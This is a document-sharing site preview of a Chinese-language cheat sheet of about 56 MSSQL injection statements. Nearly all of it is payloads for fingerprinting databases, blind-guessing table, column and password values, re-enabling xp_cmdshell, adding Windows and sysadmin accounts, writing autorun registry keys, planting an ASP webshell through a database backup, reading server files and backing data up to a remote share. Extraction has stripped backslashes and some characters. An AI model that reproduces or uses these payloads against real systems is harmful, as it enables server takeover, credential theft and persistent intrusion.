SQL注入语句示例大全.docx

上传人：飞****2

文档编号：56690667

上传时间：2022-11-03

格式：DOCX

页数：5

大小：13.58KB

( 4.5 )

《SQL注入语句示例大全.docx》由会员分享，可在线阅读，更多相关《SQL注入语句示例大全.docx（5页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、SQL注入语句示例大全1、返回的是连接的数据库名and db_name()02、作用是获取连接用户名and user03、将数据库备份到Web目录下面;backup database 数据库名 to disk=c:inetpubwwwroot1.db;4、显示SQL系统版本and 1=(select VERSION) 或and 1=convert(int,version)5、判断xp_cmdshell扩展存储过程是否存在and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name =xp_cmdshell)

2、6、恢复xp_cmdshell扩展存储的命令;exec master.dbo.sp_addextendedproc xp_cmdshell,e:inetputwebxplog70.dll;7、向启动组中写入命令行和执行程序;EXEC master.dbo.xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun,help1,REG_SZ,cmd.exe /c net user test ptlove /add8、查看当前的数据库名称and 0 db_name(n) n改成0,1,2,3就可以跨库了或and

3、 1=convert(int,db_name()9、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令（同第76）10、则把得到的数据内容全部备份到WEB目录下;backup database 数据库名 to disk=c:inetpubwwwrootsave.db11、通过复制CMD创建UNICODE漏洞;exec master.dbo.xp_cmdshell “copy c:winntsystem32cmd.exe c:inetpubscriptscmd.exe”12、遍历系统的目录结构，分析结果并发现WEB虚拟目录先创建一个临时表：temp ;create tabl

4、e temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255);(1)利用xp_availablemedia来获得当前所有驱动器,并存入temp表中 ;insert temp exec master.dbo.xp_availablemedia;通过查询temp的内容来获得驱动器列表及相关信息(2)利用xp_subdirs获得子目录列表,并存入temp表中 ;insert into temp(id) exec master.dbo.xp_subdirs c:;(3)还可以利用xp_dirtree获得

5、所有子目录的目录树结构,并寸入temp表中 ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:; （实验成功）13、查看某个文件的内容，可以通过执行xp_cmdsell;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;14、将一个文本文件插入到一个临时表中;bulk insert temp(id) from c:inetpubwwwrootindex.asp15、每完成一项浏览后，应删除TEMP中的所有内容，删除方法是：;delete from

6、 temp;16、浏览TEMP表的方法是：and (select top 1 id from TestDB.dbo.temp)0 假设TestDB是当前连接的数据库名17、猜解所有数据库名称and (select count(*) from master.dbo.sysdatabases where name1 and dbid=6) 0 dbid=6,7,8分别得到其它库名18、猜解数据库中用户名表的名称and (select count(*) from TestDB.dbo.表名)0 若表名存在，则abc.asp工作正常，否则异常。如此循环，直到猜到系统帐号表的名称。19、判断是否是sys

7、admin权限and 1=(SELECT IS_SRVROLEMEMBER(sysadmin)20、判断是否是SA用户sa=(SELECT System_user)21、查看数据库角色;use model22、查看库名and 0(select count(*) from master.dbo.sysdatabases where name1 and dbid=6)23、获得第一个用户建立表的名称and (select top 1 name from TestDB.dbo.sysobjects where xtype=U and status0 )0 假设要获得数据库是TestDB.dbo24、

8、获得第二个用户建立的表的名称and (select top 1 name from TestDB.dbo.sysobjects where xtype=U and status0 and name not in(xyz)025、获得第三个用户建立的表的名称and (select top 1 name from TestDB.dbo.sysobjects where xtype=U and status0 and name not in(xyz,”)0 ”中为第二个用户名26、获得第四个用户建立的表的名称and (select top 1 name from TestDB.dbo.sysobje

9、cts where xtype=U and status0 and name not in(xyz,”,”)0 ”,”中为第二,三个用户名27、获得表中记录的条数and (select count(*) from 表名）5 记录条数小于5 或 10 记录条数小于10 等等28、测试权限结构（mssql）and 1=(SELECT IS_SRVROLEMEMBER(sysadmin);and 1=(SELECT IS_SRVROLEMEMBER(serveradmin);and 1=(SELECT IS_SRVROLEMEMBER(setupadmin);and 1=(SELECT IS_SRV

10、ROLEMEMBER(securityadmin);and 1=(SELECT IS_SRVROLEMEMBER(diskadmin);and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin);and 1=(SELECT IS_MEMBER(db_owner);29、添加mssql和系统的帐户;exec master.dbo.sp_addlogin username;exec master.dbo.sp_password null,username,password;exec master.dbo.sp_addsrvrolemember sysadmin usern

11、ame;exec master.dbo.xp_cmdshell net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;exec master.dbo.xp_cmdshell net user username password /add;exec master.dbo.xp_cmdshell net localgroup administrators username /add;30、简洁的webshelluse modelcreate

12、table cmd(str image);insert into cmd(str) values ();backup database model to disk=g:wwwtestl.asp;请求的时候，像这样子用：http:/ip/l.asp?c=dir31、猜解字段名称猜解法：and (select count(字段名) from 表名)0 若“字段名”存在，则返回正常读取法：and (select top 1 col_name(object_id(表名),1) from sysobjects)0 把col_name(object_id(表名),1)中的1依次换成2,3,4,5，6就可得

13、到所有的字段名称。32、猜解用户名与密码ASCII码逐字解码法:基本的思路是先猜出字段的长度，然后依次猜出每一位的值and (select top 1 len(username) from admin)=X(X=1,2，3,4，5， n，假设：username为用户名字段的名称，admin为表的名称若x为某一值i且abc.asp运行正常时，则i就是第一个用户名的长度。and (select top 1 ascii(substring(username,m,1) from admin)=n (m的值在上一步得到的用户名长度之间，当m=1，2,3，时猜测分别猜测第1,2,3,位的值；n的值是1

14、9、az、AZ的ASCII值，也就是1128之间的任意值；admin为系统用户帐号表的名称)，33、建立数据表;create table 表名 (列名1 数据类型,列名2 数据类型);34、向表格中插入数据;insert into 表名 (列名1,列名2，） values (值1,值2);35、更新记录update 表名 set 列名1=值 where 36、删除记录delete from 表名 where 37、删除数据库表格drop table 表名38、将文本文件导入表使用bulk insert语法可以将一个文本文件插入到一个临时表中。简单地创建这个表：create table foo(

15、 line varchar(8000)然后执行bulk insert操作把文件中的数据插入到表中，如：bulk insert foo from c:inetpubwwwrootprocess_login.asp39、备份当前数据库的命令：declare a sysname;set a=db_name();backup database a to disk=你的IP你的共享目录bak.dat ,name=test;40、使用sp_makewebtask处理过程的相关请求写入URL; EXEC master.sp_makewebtask “10.10.1.3shareoutput.html”, “

16、SELECT * FROM INFORMATION_SCHEMA.TABLES”41、将获得SQLSERVER进程的当前工作目录中的目录列表Exec master.xp_cmdshell dir42、将提供服务器上所有用户的列表Exec master.xp_cmdshell net user43、读注册表存储过程exec xp_regread HKEY_LOCAL_MACHINE,SYSTEMCurrentControlSetServiceslanmanserverparameters, nullsessionshares44、xp_servicecontrol过程允许用户启动，停止，暂停和继

17、续服务exec master.xp_servicecontrol start,scheduleexec master.xp_servicecontrol start,server45、显示机器上有用的驱动器Xp_availablemedia46、允许获得一个目录树Xp_dirtree47、提供进程的进程ID，终止此进程Xp_terminate_process48、恢复xp_cmdshellExec master.dbo.addextendedproc xp_cmdshell,xplog70.dll49、堵上cmdshell的SQL语句sp_dropextendedproc “xp_cmdshe

18、ll”50、不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效declare shell int exec sp_oacreate wscript.shell,shell output exec sp_oamethod shell,run,null,c:winntsystem32cmd.exe /c net user gchn aaa /add51、在数据库内添加一个hax用户;exec sp_addlogin hax;52、给hax设置密码;exec master.dbo.sp_password null,username,password;53、将hax添加到s

19、ysadmin组;exec master.dbo.sp_addsrvrolemember sysadmin hax;54、(1)遍历目录;create table dirs(paths varchar(100), id int);insert dirs exec master.dbo.xp_dirtree c:;and (select top 1 paths from dirs)0;and (select top 1 paths from dirs where paths not in(上步得到的paths)55、(2)遍历目录;create table temp(id nvarchar(25

20、5),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255);insert temp exec master.dbo.xp_availablemedia; 获得当前所有驱动器;insert into temp(id) exec master.dbo.xp_subdirs c:; 获得子目录列表;insert into temp(id,num1) exec master.dbo.xp_dirtree c:; 获得所有子目录的目录树结构;insert into temp(id) exec master.dbo.xp_cmdshell typ

21、e c:webindex.asp; 查看文件的内容56、mssql中的存储过程xp_regenumvalues 注册表根键, 子键;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值xp_regread 根键,子键,键值名;exec xp_regread HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir 返回制定键的值xp_regwrite 根键,子键, 值

22、名, 值类型, 值值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName,reg_sz,hello 写入注册表xp_regdeletevalue 根键,子键,值名exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName 删除某个值xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTes

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

20 金币

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: SQL 注入语句示例大全

淘文阁 - 分享文档赚钱的网站所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

限制150内

关于本文

本文标题：SQL注入语句示例大全.docx
链接地址：https://www.taowenge.com/p-56690667.html